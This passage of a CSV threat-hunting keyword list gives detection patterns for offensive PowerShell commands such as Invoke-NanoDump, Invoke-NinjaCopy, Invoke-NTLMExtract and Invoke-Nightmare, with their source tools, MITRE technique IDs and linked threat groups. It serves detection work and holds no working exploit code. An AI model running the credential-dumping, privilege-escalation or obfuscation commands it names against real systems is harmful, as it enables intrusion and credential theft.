"*Invoke-NanoDump*",".{0,1000}Invoke\-NanoDump.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49220"
"*Invoke-NanoDump*",".{0,1000}Invoke\-NanoDump.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49221"
"*Invoke-NETMongoose*",".{0,1000}Invoke\-NETMongoose.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49222"
"*Invoke-NetRipper*",".{0,1000}Invoke\-NetRipper.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1069","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49223"
"*Invoke-NetRipper*",".{0,1000}Invoke\-NetRipper.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","49224"
"*Invoke-NetRipper.ps1*",".{0,1000}Invoke\-NetRipper\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49225"
"*Invoke-NetworkAdaptersCheck*",".{0,1000}Invoke\-NetworkAdaptersCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","N/A","10","10","3230","460","2025-03-05T14:44:17Z","2020-01-16T12:28:10Z","49226"
"*Invoke-NetworkRelay*",".{0,1000}Invoke\-NetworkRelay.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49227"
"*Invoke-NetworkRelay.ps1*",".{0,1000}Invoke\-NetworkRelay\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","49228"
"*Invoke-Nightmare *",".{0,1000}Invoke\-Nightmare\s.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/calebstewart/CVE-2021-1675","1","0","N/A","N/A","10","10","1049","230","2021-07-05T08:54:06Z","2021-07-01T23:45:58Z","49229"
"*Invoke-Nightmare -DLL *",".{0,1000}Invoke\-Nightmare\s\-DLL\s.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49230"
"*Invoke-Nightmare -NewUser*",".{0,1000}Invoke\-Nightmare\s\-NewUser.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider - Black Basta","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","49231"
"*Invoke-Nightmare*",".{0,1000}Invoke\-Nightmare.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49232"
"*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49233"
"*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","49234"
"*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","1","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","49235"
"*Invoke-NinjaCopy*",".{0,1000}Invoke\-NinjaCopy.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#windows","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","49236"
"*Invoke-NinjaCopy.ps1*",".{0,1000}Invoke\-NinjaCopy\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49237"
"*Invoke-noPac.*",".{0,1000}Invoke\-noPac\..{0,1000}","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tool","https://github.com/ricardojba/Invoke-noPac","1","0","N/A","N/A","N/A","1","62","12","2023-02-16T10:45:19Z","2021-12-13T19:01:18Z","49238"
"*Invoke-NTDS.ps1*",".{0,1000}Invoke\-NTDS\.ps1.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","49239"
"*Invoke-NTLMAuth.ps1*",".{0,1000}Invoke\-NTLMAuth\.ps1.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","49240"
"*Invoke-NTLMExtract*",".{0,1000}Invoke\-NTLMExtract.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49241"
"*Invoke-NTLMExtract*",".{0,1000}Invoke\-NTLMExtract.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49242"
"*Invoke-NTLMExtract.ps1*",".{0,1000}Invoke\-NTLMExtract\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","49243"
"*Invoke-Ntsd.ps1*",".{0,1000}Invoke\-Ntsd\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1148","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","49244"
"*Invoke-Obfuscation -ScriptPath *",".{0,1000}Invoke\-Obfuscation\s\-ScriptPath\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","49245"
"*Invoke-Obfuscation*",".{0,1000}Invoke\-Obfuscation.{0,1000}","offensive_tool_keyword","Invoke-Obfuscation","Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator.","T1027 - T1059.001 - T1564.003","TA0005 - TA0002","N/A","Oilrig - Dispossessor","Defense Evasion","https://github.com/danielbohannon/Invoke-Obfuscation","1","1","N/A","N/A","10","10","3935","782","2023-08-10T23:49:06Z","2016-09-25T03:38:02Z","49246"
"*Invoke-Obfuscation.psd1*",".{0,1000}Invoke\-Obfuscation\.psd1.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","49247"
"*Invoke-OpenInboxFinder*",".{0,1000}Invoke\-OpenInboxFinder.{0,1000}","offensive_tool_keyword","MailSniper","MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords. insider intel. network architecture information. etc.). It can be used as a non-administrative user to search their own email. or by an administrator to search the mailboxes of every user in a domain.","T1087.003 - T1110.003 - T1114.002","TA0006 -TA0009 -TA0007","N/A","Leafminer","Credential Access","https://github.com/dafthack/MailSniper/blob/master/MailSniper.ps1","1","1","N/A","N/A","N/A","10","3046","580","2024-08-07T18:11:58Z","2016-09-08T00:36:51Z","49248"
"*Invoke-OpenOWAMailboxInBrowser*",".{0,1000}Invoke\-OpenOWAMailboxInBrowser.{0,1000}","offensive_tool_keyword","TokenTactics","Azure JWT Token Manipulation Toolset","T1134.002 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/rvrsh3ll/TokenTactics","1","1","N/A","N/A","6","7","652","105","2024-12-06T15:51:42Z","2021-07-08T02:28:12Z","49249"
"*Invoke-OxidResolver*",".{0,1000}Invoke\-OxidResolver.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49250"
"*Invoke-Oxidresolver*",".{0,1000}Invoke\-Oxidresolver.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49251"
"*Invoke-OxidResolver*",".{0,1000}Invoke\-OxidResolver.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","49252"
"*Invoke-P0wnedshell*",".{0,1000}Invoke\-P0wnedshell.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49253"
"*Invoke-P0wnedshellx86*",".{0,1000}Invoke\-P0wnedshellx86.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","49254"
"*Invoke-PacketCapture*",".{0,1000}Invoke\-PacketCapture.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - 